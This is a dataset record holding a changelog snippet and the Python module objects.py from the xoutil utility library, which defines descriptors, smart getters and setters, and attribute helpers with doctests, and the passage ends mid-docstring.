"/docs/source/history/_changes-1.8.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Deprecate module ``xoutil.logger``.\n\n- Remove deprecated function ``xoutil.iterators.fake_dict_iteritems``.\n\n- Add `xoutil.objects.temp_attributes`:func:.\n\n- Add functions `~xoutil.fp.tools.fst`:func: and `~xoutil.fp.tools.snd`:func:.\n" }, { "alpha_fraction": 0.5805119872093201, "alphanum_fraction": 0.5839699506759644, "avg_line_length": 30.612380981445312, "blob_id": "9c63ed9b5a239ecb2d16ee9b17d08d910640252b", "content_id": "322e57a9d36fc3122206b637a1d0fb5b95151daa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56682, "license_type": "no_license", "max_line_length": 88, "num_lines": 1793, "path": "/xotl/tools/objects.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Several utilities for objects in general.\"\"\"\n\nfrom contextlib import contextmanager\n\nfrom xotl.tools.symbols import Unset\nfrom xotl.tools.deprecation import deprecated\n\n\n__docstring_format__ = \"rst\"\n\n\n_INVALID_CLASS_TYPE_MSG = \"``cls`` must be a class not an instance\"\n\n\ndef _len(x):\n \"Safe length\"\n return len(x) if x else 0\n\n\n# TODO: Deprecate these two functions, can be used to always return True or\n# False\ndef _true(*args, **kwargs):\n return True\n\n\ndef _false(*args, **kwargs):\n return False\n\n\nclass SafeDataItem:\n \"\"\"A data descriptor that is safe.\n\n A *safe descriptor* never uses internal special methods ``__getattr__``\n and ``__getattribute__`` to obtain its value. 
Also allow to define a\n constructor or a default value for the first time the attribute is read\n without a prior value assigned.\n\n Need to be used only in scenarios where descriptor instance values must be\n accessed safely in '__getattr__' implementations.\n\n This class only can be instanced inner a class context in one of the\n following scenarios::\n\n 1. As a normal descriptor not associated with a constructor method::\n\n >>> from xotl.tools.objects import SafeDataItem as safe\n >>> class Foobar:\n ... safe('mapping', dict)\n >>> f = Foobar()\n >>> f.mapping\n {}\n\n 2. As a normal descriptor but associated with a constructor method::\n\n >>> class Foobar:\n ... @safe.property\n ... def mapping(self):\n ... return {'this': self}\n >>> f = Foobar()\n >>> f.mapping['this'] is f\n True\n\n 3. As a slot. In this case generate an internal slot and a safe\n descriptor to access it::\n\n >>> class Foobar:\n ... __slots__ = safe.slot('mapping', dict)\n >>> f = Foobar()\n >>> f.mapping\n {}\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Creates a new safe descriptor.\n\n Arguments are parsed to discover:\n\n - An attribute name if a string with a valid identifier is given as a\n positional argument.\n\n - A constructor for initial or default value when the descriptor is\n read without being assigned. Positional argument with a callable.\n\n - Default literal value is given using a keyword argument with any of\n the following names: `default`, `value` or `initial_value`. If this\n argument is given the constructor callable is invalid.\n\n - A checker for value validity with the keyword argument with any of\n the following names: `validator`, `checker` or `check`. 
The checker\n could be a type, a tuple of types, a function receiving the value\n and return True or False, or a list containing arguments to use\n `xotl.tools.validators.check`:func:.\n\n - Boolean `False` to avoid assigning the descriptor in the class\n context with the keyword argument `do_assigning`. Any other value\n but `False` is invalid because this concept is implicitly required\n and use a `False` value is allowed but discouraged.\n\n See :meth:`__parse_arguments` for more information.\n\n \"\"\"\n self.__parse_arguments(*args, **kwargs)\n if self.do_assigning:\n cls_locals = self._get_class_context()\n current = cls_locals.get(self.attr_name)\n if not isinstance(current, SafeDataItem):\n cls_locals[self.attr_name] = self\n else:\n msg = (\n \"class `%s` has already an assigned descriptor with \"\n \"the same name `%s`\"\n )\n type_name = type(self).__name__\n raise AttributeError(msg % (type_name, self.attr_name))\n\n @staticmethod\n def slot(slot_name, *args, **kwargs):\n \"\"\"Generate an internal slot and this descriptor to access it.\n\n This must appears in a slots declaration::\n\n class Foobar:\n __slots__ = (SafeDataItem.slot('mapping', dict), ...)\n\n This method return the inner slot name, argument passed is used for\n the safe descriptor. In the example above the slot descriptor will be\n `__mapping__` and `mapping` the safe descriptor.\n\n \"\"\"\n self = SafeDataItem(slot_name, *args, **kwargs)\n return self.inner_name\n\n @staticmethod\n def property(*args, **kwargs):\n \"\"\"Descriptor to access a property value based in a method.\n\n There are two ways of use this method:\n\n - With only one positional and no keyword arguments. The positional\n argument must be a method which is assumed as the constructor of the\n original property value. Method name is used as the attribute name.\n In this case it returns a safe descriptor::\n\n >>> from xotl.tools.objects import SafeDataItem as safe\n >>> class Foobar:\n ... @safe.property\n ... 
def mapping(self):\n ... 'To generate a safe `mapping` descriptor.'\n ... return {'this': self}\n >>> f = Foobar()\n >>> f.mapping['this'] is f\n True\n\n - With no positional and with keyword arguments. In this case it\n returns a decorator that receive one single argument (the method)\n and return the safe descriptor::\n\n >>> class Foobar:\n ... @safe.property(kind='class')\n ... def mapping(cls):\n ... 'To generate a safe `mapping` descriptor.'\n ... return {'this': cls}\n >>> f = Foobar()\n >>> f.mapping['this'] is Foobar\n True\n\n\n Returns the safe descriptor instance if only the method is given, or a\n closure if additional keyword arguments are given.\n\n Additional keyword argument `kind` could be 'normal' (for normal\n methods), 'static' (for static methods), and 'class' (for class\n methods)::\n\n \"\"\"\n\n def inner(method):\n from types import FunctionType as function\n from xotl.tools.validators import check\n\n FUNC_KINDS = (\"normal\", \"static\", \"class\")\n FUNC_TYPES = (function, staticmethod, classmethod)\n IN_FUNC_TYPES = FUNC_KINDS.__contains__\n KIND_NAME = \"kind\"\n kind = kwargs.pop(KIND_NAME, FUNC_KINDS[0])\n if check(kind, IN_FUNC_TYPES) and check(method, FUNC_TYPES):\n kwargs[\"do_assigning\"] = False\n\n def init():\n from sys import _getframe\n\n obj = _getframe(1).f_locals[\"obj\"]\n if kind == FUNC_KINDS[0]:\n return method(obj)\n elif kind == FUNC_KINDS[1]:\n return method()\n else:\n return method(type(obj))\n\n init.__name__ = method.__name__\n return SafeDataItem(init, **kwargs)\n\n if kwargs:\n return inner\n elif len(args) == 1:\n return inner(args[0])\n else:\n msg = \"expected only one positional argument, got %s\"\n raise TypeError(msg % len(args))\n\n def __get__(self, obj, owner):\n if obj is not None:\n from xotl.tools.future.inspect import get_attr_value\n\n res = get_attr_value(obj, self.inner_name, Unset)\n if res is not Unset:\n return res\n elif self.init is not Unset:\n res = self.init()\n self.__set__(obj, 
res)\n return res\n elif self.default is not Unset:\n res = self.default\n self.__set__(obj, res)\n return res\n else:\n msg = \"'{}' object has no attribute '{}'\"\n type_name = type(obj).__name__\n raise AttributeError(msg.format(type_name, self.attr_name))\n else:\n return self\n\n def __set__(self, obj, value):\n object.__setattr__(obj, self.inner_name, value)\n\n def __delete__(self, obj):\n object.__delattr__(obj, self.inner_name)\n\n def _get_class_context(self):\n \"Get the class variable context\"\n from sys import _getframe\n\n frame = _getframe(1)\n i, MAX = 0, 5\n res = None\n while not res and (i < MAX):\n aux = frame.f_locals\n if \"__module__\" in aux:\n res = aux\n else:\n frame = frame.f_back\n i += 1\n if res:\n return res\n else:\n msg = \"Invalid `SafeDataItem(%s)` call, must be used in a class \" \"context.\"\n raise TypeError(msg % self.attr_name)\n\n def _unique_name(self):\n \"\"\"Generate a unique new name.\"\"\"\n from time import time\n from xotl.tools.bases import int2str\n\n return \"_%s\" % int2str(int(1000000 * time()))\n\n def __parse_arguments(self, *args, **kwargs):\n \"\"\"Assign parsed arguments to the just created instance.\"\"\"\n from xotl.tools.validators import is_valid_identifier, predicate\n\n self.attr_name = Unset\n self.init = Unset\n self.default = Unset\n self.do_assigning = True\n self.validator = True\n for i, arg in enumerate(args):\n if self.attr_name is Unset and is_valid_identifier(arg):\n self.attr_name = arg\n elif self.init is Unset and callable(arg):\n self.init = arg\n else:\n msg = (\n \"Invalid positional arguments: %s at %s\\n\"\n \"Valid arguments are the attribute name and a \"\n \"callable constructor for initial value.\"\n )\n raise ValueError(msg % (args[i:], i))\n bads = {}\n for key in kwargs:\n value = kwargs[key]\n if (\n self.default is Unset\n and self.init is Unset\n and key in (\"default\", \"value\", \"initial_value\")\n ):\n self.default = value\n elif self.validator is True and key in 
(\"validator\", \"checker\", \"check\"):\n self.validator = value\n elif self.do_assigning is True and key == \"do_assigning\" and value is False:\n self.do_assigning = False\n else:\n bads[key] = value\n self.validator = predicate(self.validator)\n if bads:\n msg = (\n \"Invalid keyword arguments: %s\\n\"\n \"See constructor documentation for more info.\"\n )\n raise ValueError(msg % bads)\n if self.attr_name is Unset:\n from xotl.tools.names import nameof\n\n if self.init is not Unset:\n if isinstance(self.init, type):\n self.attr_name = str(\"_%s\" % self.init.__name__)\n else:\n self.attr_name = nameof(self.init, safe=True)\n else:\n self.attr_name = self._unique_name()\n self.inner_name = str(\"__%s__\" % self.attr_name.strip(\"_\"))\n\n\ndef smart_getter(obj, strict=False):\n \"\"\"Returns a smart getter for `obj`.\n\n If `obj` is a mapping, it returns the ``.get()`` method bound to the\n object `obj`, otherwise it returns a partial of ``getattr`` on `obj`.\n\n :param strict: Set this to True so that the returned getter checks that\n keys/attrs exists. If `strict` is True the getter may\n raise a KeyError or an AttributeError.\n\n .. versionchanged:: 1.5.3 Added the parameter `strict`.\n\n \"\"\"\n from xotl.tools.future.collections import Mapping\n\n if isinstance(obj, Mapping):\n if not strict:\n return obj.get\n else:\n\n def getter(key, default=Unset):\n \"Get the given key. Raise an error when it doesn't exists.\"\n try:\n return obj[key]\n except KeyError:\n if default is Unset:\n raise\n else:\n return default\n\n return getter\n else:\n if not strict:\n\n def getter(attr, default=None):\n \"Get the given attr. Return default if it doesn't exists.\"\n return getattr(obj, attr, default)\n\n return getter\n else:\n\n def getter(attr, default=Unset):\n \"Get the given attr. 
Raise an error when it doesn't exists.\"\n try:\n return getattr(obj, attr)\n except AttributeError:\n if default is Unset:\n raise\n else:\n return default\n\n return getter\n\n\ndef smart_setter(obj):\n \"\"\"Returns a smart setter for `obj`.\n\n If `obj` is a mutable mapping, it returns the ``.__setitem__()`` method\n bound to the object `obj`, otherwise it returns a partial of ``setattr``\n on `obj`.\n\n .. versionadded:: 1.8.2\n\n \"\"\"\n from xotl.tools.future.functools import partial\n from xotl.tools.future.collections import MutableMapping\n\n if isinstance(obj, MutableMapping):\n return obj.__setitem__\n else:\n return partial(setattr, obj)\n\n\ndef smart_getter_and_deleter(obj):\n \"\"\"Returns a function that get and deletes either a key or an attribute of\n obj depending on the type of `obj`.\n\n If `obj` is a `collections.Mapping` it must be a\n `collections.MutableMapping`.\n\n \"\"\"\n from collections import Mapping, MutableMapping\n from functools import partial\n\n if isinstance(obj, Mapping) and not isinstance(obj, MutableMapping):\n raise TypeError(\"If `obj` is a Mapping it must be a MutableMapping\")\n if isinstance(obj, MutableMapping):\n return lambda key, default=None: obj.pop(key, default)\n else:\n return partial(popattr, obj)\n\n\n# TODO: [med] See the get_traverser. I think the function is actually\n# a subtype of that. 
Also, this method sticks with the getter for the\n# top object, see the failing companion test in this commit.\ndef multi_getter(source, *ids):\n \"\"\"Get values from `source` of all given `ids`.\n\n :param source: Any object but dealing with differences between mappings\n and other object types.\n\n :param ids: Identifiers to get values from `source`.\n\n An ID item could be:\n\n - a string: is considered a key, if `source` is a mapping, or an\n attribute name if `source` is an instance of any other type.\n\n - a collection of strings: find the first valid value in `source`\n evaluating each item in this collection using the above logic.\n\n Example::\n\n >>> d = {'x': 1, 'y': 2, 'z': 3}\n >>> list(multi_getter(d, 'a', ('y', 'x'), ('x', 'y'), ('a', 'z', 'x')))\n [None, 2, 1, 3]\n\n >>> next(multi_getter(d, ('y', 'x'), ('x', 'y')), '---')\n 2\n\n >>> next(multi_getter(d, 'a', ('b', 'c'), ('e', 'f')), '---') is None\n True\n\n .. versionadded:: 1.7.1\n\n \"\"\"\n getter = smart_getter(source)\n\n def first(a):\n return next((i for i in map(getter, a) if i is not None), None)\n\n def get(a):\n from xotl.tools.values.simple import logic_iterable_coerce as many\n\n return first(a) if many(a) else getter(a)\n\n return (get(aux) for aux in ids)\n\n\ndef mass_setattr(obj, **attrs):\n \"\"\"Set all given attributes and return the same object.\"\"\"\n # See 'xotl.tools.decorator.constant_bagger' ;)\n for attr in attrs:\n setattr(obj, attr, attrs[attr])\n return obj\n\n\ndef is_private_name(name):\n \"\"\"Return if `name` is private or not.\"\"\"\n prefix = \"__\"\n return name.startswith(prefix) and not name.endswith(prefix)\n\n\ndef fix_private_name(cls, name):\n \"\"\"Correct a private name with Python conventions, return the same value if\n name is not private.\n\n \"\"\"\n if is_private_name(name):\n return str(\"_%s%s\" % (cls.__name__, name))\n else:\n return name\n\n\n# TODO: @med, @manu, Decide if it's best to create a\n# 'xotl.tools.future.inspect' that extends 
the standard library module\n# 'inspect' and place this signature-dealing functions there. Probably, to be\n# consistent, this imposes a refactoring of some of 'xotl.tools.future.types'\n# and move all the \"is_classmethod\", \"is_staticmethod\" and inspection-related\n# functions there.\ndef get_method_function(cls, method_name):\n \"\"\"Get definition function given in its `method_name`.\n\n There is a difference between the result of this function and\n ``getattr(cls, method_name)`` because the last one return the unbound\n method and this a python function.\n\n \"\"\"\n if not isinstance(cls, type):\n cls = cls.__class__\n mro = cls.mro()\n i, res = 0, None\n while not res and (i < len(mro)):\n sc = mro[i]\n method = sc.__dict__.get(method_name)\n if callable(method):\n res = method\n else:\n i += 1\n return res\n\n\ndef build_documentation(cls, get_doc=None, deep=1):\n \"\"\"Build a proper documentation from a class `cls`.\n\n Classes are recursed in MRO until process all levels (`deep`)\n building the resulting documentation.\n\n The function `get_doc` get the documentation of a given class. 
If\n no function is given, then attribute ``__doc__`` is used.\n\n \"\"\"\n from xotl.tools.future.codecs import safe_decode\n\n assert isinstance(cls, type), _INVALID_CLASS_TYPE_MSG\n if deep < 1:\n deep = 1\n get_doc = get_doc or (lambda c: c.__doc__)\n mro = cls.mro()\n i, level, used, res = 0, 0, {}, \"\"\n while (level < deep) and (i < len(mro)):\n sc = mro[i]\n doc = get_doc(sc)\n if doc:\n doc = safe_decode(doc).strip()\n key = sc.__name__\n docs = used.setdefault(key, set())\n if doc not in docs:\n docs.add(doc)\n if res:\n res += \"\\n\\n\"\n res += \"=== <%s> ===\\n\\n%s\" % (key, doc)\n level += 1\n i += 1\n return res\n\n\ndef fix_class_documentation(cls, ignore=None, min_length=10, deep=1, default=None):\n \"\"\"Fix the documentation for the given class using its super-classes.\n\n This function may be useful for shells or Python Command Line Interfaces\n (CLI).\n\n If `cls` has an invalid documentation, super-classes are recursed\n in MRO until a documentation definition was made at any level.\n\n :param ignore: could be used to specify which classes to ignore by\n specifying its name in this list.\n\n :param min_length: specify that documentations with less that a number of\n characters, also are ignored.\n\n \"\"\"\n assert isinstance(cls, type), _INVALID_CLASS_TYPE_MSG\n if _len(cls.__doc__) < min_length:\n ignore = ignore or ()\n\n def get_doc(c):\n if (c.__name__ not in ignore) and _len(c.__doc__) >= min_length:\n return c.__doc__\n else:\n return None\n\n doc = build_documentation(cls, get_doc, deep)\n if doc:\n cls.__doc__ = doc\n elif default:\n cls.__doc__ = default(cls) if callable(default) else default\n\n\ndef fix_method_documentation(\n cls, method_name, ignore=None, min_length=10, deep=1, default=None\n):\n \"\"\"Fix the documentation for the given class using its super-classes.\n\n This function may be useful for shells or Python Command Line Interfaces\n (CLI).\n\n If `cls` has an invalid documentation, super-classes are recursed in 
MRO\n until a documentation definition was made at any level.\n\n :param ignore: could be used to specify which classes to ignore by\n specifying its name in this list.\n\n :param min_length: specify that documentations with less that a number of\n characters, also are ignored.\n\n \"\"\"\n assert isinstance(cls, type), _INVALID_CLASS_TYPE_MSG\n method = get_method_function(cls, method_name)\n if method and _len(method.__doc__) < min_length:\n ignore = ignore or ()\n\n def get_doc(c):\n if c.__name__ not in ignore:\n method = c.__dict__.get(method_name)\n if callable(method) and _len(method.__doc__) >= min_length:\n return method.__doc__\n else:\n return None\n else:\n return None\n\n doc = build_documentation(cls, get_doc, deep)\n if doc:\n method.__doc__ = doc\n elif default:\n method.__doc__ = default(cls) if callable(default) else default\n\n\ndef fulldir(obj):\n \"\"\"Return a set with all attribute names defined in `obj`\"\"\"\n from xotl.tools.future.inspect import get_attr_value, _static_getmro\n\n def getdir(o):\n return set(get_attr_value(o, \"__dict__\", {}))\n\n if isinstance(obj, type):\n res = set.union(getdir(cls) for cls in _static_getmro(obj))\n else:\n res = getdir(obj)\n return res if isinstance(obj, type) else res | set(dir(type(obj)))\n\n\ndef xdir(obj, getter=None, filter=None, _depth=0):\n \"\"\"Return all ``(attr, value)`` pairs from `obj` make ``filter(attr, value)``\n True.\n\n :param obj: The object to be instrospected.\n\n :param filter: A filter that will be passed both the attribute\n name and it's value as two positional arguments. It should return True\n for attrs that should be yielded.\n\n If None, all pairs will match.\n\n :param getter: A function with the same signature that\n ``getattr`` to be used to get the values from `obj`. If\n None, use `getattr`:func:.\n\n .. 
versionchanged:: 1.8.1 Removed deprecated `attr_filter` and\n `value_filter` arguments.\n\n \"\"\"\n getter = getter or getattr\n attrs = dir(obj)\n res = ((a, getter(obj, a)) for a in attrs)\n if filter:\n res = ((a, v) for a, v in res if filter(a, v))\n return res\n\n\ndef fdir(obj, getter=None, filter=None):\n \"\"\"Similar to `xdir`:func: but yields only the attributes names.\"\"\"\n full = xdir(obj, getter=getter, filter=filter, _depth=1)\n return (attr for attr, _v in full)\n\n\ndef validate_attrs(source, target, force_equals=(), force_differents=()):\n \"\"\"Makes a 'comparison' of `source` and `target` by its attributes (or\n keys).\n\n This function returns True if and only if both of these tests\n pass:\n\n - All attributes in `force_equals` are equal in `source` and `target`\n\n - All attributes in `force_differents` are different in `source` and\n `target`\n\n For instance::\n\n >>> class Person:\n ... def __init__(self, **kwargs):\n ... for which in kwargs:\n ... setattr(self, which, kwargs[which])\n\n >>> source = Person(name='Manuel', age=33, sex='male')\n >>> target = {'name': 'Manuel', 'age': 4, 'sex': 'male'}\n\n >>> validate_attrs(source, target, force_equals=('sex',),\n ... 
force_differents=('age',))\n True\n\n >>> validate_attrs(source, target, force_equals=('age',))\n False\n\n If both `force_equals` and `force_differents` are empty it will\n return True::\n\n >>> validate_attrs(source, target)\n True\n\n \"\"\"\n from operator import eq, ne\n\n res = True\n tests = ((eq, force_equals), (ne, force_differents))\n j = 0\n get_from_source = smart_getter(source)\n get_from_target = smart_getter(target)\n while res and (j < len(tests)):\n passed, attrs = tests[j]\n i = 0\n while res and (i < len(attrs)):\n attr = attrs[i]\n if passed(get_from_source(attr), get_from_target(attr)):\n i += 1\n else:\n res = False\n j += 1\n return res\n\n\n# Mark this so that informed people may use it.\nvalidate_attrs._positive_testing = True\n\n\ndef iterate_over(source, *keys):\n \"\"\"Yields pairs of (key, value) for of all `keys` in `source`.\n\n If any `key` is missing from `source` is ignored (not yielded).\n\n If `source` is a `collection\n <xotl.tools.values.simple.logic_collection_coerce>`:func:, iterate over\n each of the items searching for any of keys. This is not recursive.\n\n If no `keys` are provided, return an \"empty\" iterator -- i.e will raise\n StopIteration upon calling `next`.\n\n .. 
versionadded:: 1.5.2\n\n \"\"\"\n from xotl.tools.values.simple import logic_collection_coerce, nil\n\n def inner(source):\n get = smart_getter(source)\n for key in keys:\n val = get(key, Unset)\n if val is not Unset:\n yield key, val\n\n def when_collection(source):\n for generator in map(inner, source):\n for key, val in generator:\n yield key, val\n\n if logic_collection_coerce(source) is not nil:\n res = when_collection(source)\n else:\n res = inner(source)\n return res\n\n\ndef get_first_of(source, *keys, default=None, pred=None):\n \"\"\"Return the value of the first occurrence of any of the specified `keys`\n in `source` that matches `pred` (if given).\n\n Both `source` and `keys` has the same meaning as in `iterate_over`:func:.\n\n :param default: A value to be returned if no key is found in `source`.\n\n :param pred: A function that should receive a single value and return\n False if the value is not acceptable, and thus\n `get_first_of` should look for another.\n\n .. versionchanged:: 1.5.2 Added the `pred` option.\n\n \"\"\"\n _key, res = next(\n ((k, val) for k, val in iterate_over(source, *keys) if not pred or pred(val)),\n (Unset, Unset),\n )\n return res if res is not Unset else default\n\n\ndef pop_first_of(source, *keys, **kwargs):\n \"\"\"Similar to `get_first_of`:func: using as `source` either an object or a\n mapping and deleting the first attribute or key.\n\n Examples::\n\n >>> somedict = dict(bar='bar-dict', eggs='eggs-dict')\n\n >>> class Foo: pass\n >>> foo = Foo()\n >>> foo.bar = 'bar-obj'\n >>> foo.eggs = 'eggs-obj'\n\n >>> pop_first_of((somedict, foo), 'eggs')\n 'eggs-dict'\n\n >>> pop_first_of((somedict, foo), 'eggs')\n 'eggs-obj'\n\n >>> pop_first_of((somedict, foo), 'eggs') is None\n True\n\n >>> pop_first_of((foo, somedict), 'bar')\n 'bar-obj'\n\n >>> pop_first_of((foo, somedict), 'bar')\n 'bar-dict'\n\n >>> pop_first_of((foo, somedict), 'bar') is None\n True\n\n \"\"\"\n from xotl.tools.values.simple import logic_collection_coerce, 
nil\n\n def inner(source):\n get = smart_getter_and_deleter(source)\n res, i = Unset, 0\n while (res is Unset) and (i < len(keys)):\n res = get(keys[i], Unset)\n i += 1\n return res\n\n if logic_collection_coerce(source) is not nil:\n res = Unset\n source = iter(source)\n probe = next(source, None)\n while res is Unset and probe:\n res = inner(probe)\n probe = next(source, None)\n else:\n res = inner(source)\n return res if res is not Unset else kwargs.get(\"default\", None)\n\n\ndef popattr(obj, name, default=None):\n \"\"\"Looks for an attribute in the `obj` and returns its value and removes\n the attribute. If the attribute is not found, `default` is returned\n instead.\n\n Examples::\n\n >>> class Foo:\n ... a = 1\n >>> foo = Foo()\n >>> foo.a = 2\n >>> popattr(foo, 'a')\n 2\n >>> popattr(foo, 'a')\n 1\n >>> popattr(foo, 'a') is None\n True\n\n \"\"\"\n res = getattr(obj, name, Unset)\n if res is Unset:\n res = default\n else:\n try:\n delattr(obj, name)\n except AttributeError:\n try:\n delattr(obj.__class__, name)\n except AttributeError:\n pass\n return res\n\n\nclass lazy:\n \"\"\"Marks a value as a lazily evaluated value. See `setdefaultattr`:func:.\n\n \"\"\"\n\n def __init__(self, value, *args, **kwargs):\n self.value = value\n self.args = args\n self.kwargs = kwargs\n\n def __call__(self):\n res = self.value\n if callable(res):\n return res(*self.args, **self.kwargs)\n else:\n return res\n\n\ndef iter_branch_subclasses(cls, include_this=True):\n \"\"\"Internal function, see `get_branch_subclasses`:func:.\"\"\"\n children = type.__subclasses__(cls)\n if children:\n for sc in children:\n yield from iter_branch_subclasses(sc)\n elif include_this:\n yield cls\n\n\ndef get_branch_subclasses(cls, *, include_this=False):\n \"\"\"Similar to `type.__subclasses__`:meth: but recursive.\n\n Only return sub-classes in branches (those with no sub-classes). Instead\n of returning a list, yield each valid value.\n\n .. versionadded:: 1.7.0\n\n .. 
versionchanged:: 2.1.5 Add keyword-only argument `include_this`.\n\n \"\"\"\n return list(iter_branch_subclasses(cls, include_this=include_this))\n\n\n@deprecated(iter_branch_subclasses)\ndef iter_final_subclasses(cls, *, include_this=True):\n \"\"\"Iterate over the final sub-classes of `cls`.\n\n Final classes are those which has no sub-classes. If `cls` is final, the\n iterator yields only `cls` unless `include_this` is False.\n\n .. versionadded:: 2.1.0\n\n .. deprecated:: 2.1.5 This is actually a duplicate of\n `iter_branch_subclasses`:func:.\n\n \"\"\"\n return iter_branch_subclasses(cls, include_this=include_this)\n\n\n@deprecated(get_branch_subclasses)\ndef get_final_subclasses(cls, *, include_this=True):\n \"\"\"List final sub-classes of `cls`.\n\n See `iter_final_subclasses`:func:.\n\n .. versionadded:: 2.1.0\n\n .. deprecated:: 2.1.5 This is a duplicate of\n `get_branch_subclasses`:func:.\n\n \"\"\"\n return list(iter_final_subclasses(cls, include_this=include_this))\n\n\ndef FinalSubclassEnumeration(superclass, *, dynamic=True):\n \"\"\"A final sub-class enumeration.\n\n Return a enumeration-like class (i.e has ``__members__`` and each\n attribute) that enumerates the **final** subclasses of a given superclass\n (not including `superclass`).\n\n If `dynamic` is True, don't cache the subclasses; i.e if a new subclass is\n created after the enumeration, the __members__ dictionary will change.\n\n The resulting enumeration class has a method ``invalidate_cache()`` which\n allows non-dynamic classes to update its underlying cache.\n\n .. 
versionadded:: 2.1.0\n\n \"\"\"\n\n class enumtype(type):\n @property\n def __members__(self):\n if self._cached_members is None or self._dynamic:\n result = {\n c.__name__: c\n for c in iter_branch_subclasses(superclass, include_this=False)\n }\n if not self._dynamic:\n self._cached_members = dict(result)\n else:\n result = dict(self._cached_members)\n return result\n\n def __getattr__(self, attr):\n result = self.__members__.get(attr, None)\n if result is None:\n raise AttributeError(attr)\n else:\n return result\n\n def __dir__(self):\n return list(self.__members__.keys()) + [\"__members__\"]\n\n def invalidate_cache(self):\n self._cached_members = None\n\n class enumeration(metaclass=enumtype):\n _dynamic = dynamic\n _cached_members = None\n\n return enumeration\n\n\n# TODO: Check `xotl.tools.future.types.DynamicClassAttribute`:class: for more\n# information and to compare with this one.\nclass xproperty(property):\n \"\"\"Descriptor that gets values the same for instances and for classes.\n\n Example of its use::\n\n >>> class Foobar:\n ... _x = 'in the class'\n ...\n ... def __init__(self):\n ... self._x = 'in the instance'\n ...\n ... @xproperty\n ... def x(self):\n ... return self._x\n\n >>> f = Foobar()\n\n >>> Foobar.x\n 'in the class'\n\n >>> f.x\n 'in the instance'\n\n X-properties are always read-only, if attribute values must be set or\n deleted, a metaclass must be defined.\n\n .. 
versionadded:: 1.8.0\n\n \"\"\"\n\n def __init__(self, fget, doc=None):\n if fget is not None:\n super().__init__(fget, doc=doc)\n else:\n raise TypeError('xproperty() the \"fget\" argument is requiered')\n\n def __get__(self, instance, owner):\n return self.fget(instance if instance is not None else owner)\n\n\nclass classproperty(property):\n \"\"\"A descriptor that behaves like property for instances but for classes.\n\n Example of its use::\n\n class Foobar:\n @classproperty\n def getx(cls):\n return cls._x\n\n A writable `classproperty` is difficult to define, and it's not intended\n for that case because 'setter', and 'deleter' decorators can't be used for\n obvious reasons. For example::\n\n class Foobar:\n x = 1\n def __init__(self, x=2):\n self.x = x\n def _get_name(cls):\n return str(cls.x)\n def _set_name(cls, x):\n cls.x = int(x)\n name = classproperty(_get_name, _set_name)\n\n .. versionadded:: 1.4.1\n\n .. versionchanged:: 1.8.0 Inherits from `property`\n\n \"\"\"\n\n def __get__(self, instance, owner):\n obj = type(instance) if instance is not None else owner\n return super().__get__(obj, owner)\n\n def __set__(self, instance, value):\n obj = instance if isinstance(instance, type) else type(instance)\n super().__set__(obj, value)\n\n def __delete__(self, instance):\n obj = instance if isinstance(instance, type) else type(instance)\n super().__delete__(obj)\n\n\nclass staticproperty(property):\n \"\"\"A descriptor that behaves like properties for instances but static.\n\n Example of its use::\n\n class Foobar:\n @staticproperty\n def getx():\n return 'this is static'\n\n A writable `staticproperty` is difficult to define, and it's not intended\n for that case because 'setter', and 'deleter' decorators can't be used for\n obvious reasons. For example::\n\n class Foobar:\n x = 1\n def __init__(self, x=2):\n self.x = x\n def _get_name():\n return str(Foobar.x)\n def _set_name(x):\n Foobar.x = int(x)\n name = staticproperty(_get_name, _set_name)\n\n .. 
versionadded:: 1.8\n\n \"\"\"\n\n def __get__(self, instance, owner):\n if self.fget is not None:\n return self.fget()\n else:\n raise AttributeError(\"unreadable attribute\")\n\n def __set__(self, instance, value):\n if self.fset is not None:\n self.fset(value)\n else:\n raise AttributeError(\"can't set attribute\")\n\n def __delete__(self, instance):\n if self.fdel is not None:\n self.fdel()\n else:\n raise AttributeError(\"can't delete attribute\")\n\n\n# The following is extracted from the SQLAlchemy project's codebase, merit and\n# copyright goes to SQLAlchemy authors.\n#\n# Copyright (C) 2005-2011 the SQLAlchemy authors and contributors\n#\n# This module is part of SQLAlchemy and is released under the MIT License:\n# http://www.opensource.org/licenses/mit-license.php\n#\nclass memoized_property:\n \"\"\"A read-only property that is only evaluated once.\n\n This is extracted from the SQLAlchemy project's codebase, merit and\n copyright goes to SQLAlchemy authors::\n\n Copyright (C) 2005-2011 the SQLAlchemy authors and contributors\n\n This module is part of SQLAlchemy and is released under the MIT License:\n http://www.opensource.org/licenses/mit-license.php\n\n \"\"\"\n\n def __init__(self, fget, doc=None):\n self.fget = fget\n self.__doc__ = doc or fget.__doc__\n self.__name__ = fget.__name__\n\n def __get__(self, obj, cls):\n if obj is None:\n return self\n obj.__dict__[self.__name__] = result = self.fget(obj)\n return result\n\n def reset(self, instance):\n \"\"\"Clear the cached value of `instance`.\"\"\"\n instance.__dict__.pop(self.__name__, None)\n\n\ndef setdefaultattr(obj, name, value):\n \"\"\"Sets the attribute name to value if it is not set::\n\n >>> class Someclass: pass\n >>> inst = Someclass()\n >>> setdefaultattr(inst, 'foo', 'bar')\n 'bar'\n\n >>> inst.foo\n 'bar'\n\n >>> inst.spam = 'egg'\n >>> setdefaultattr(inst, 'spam', 'with ham')\n 'egg'\n\n (`New in version 1.2.1`). 
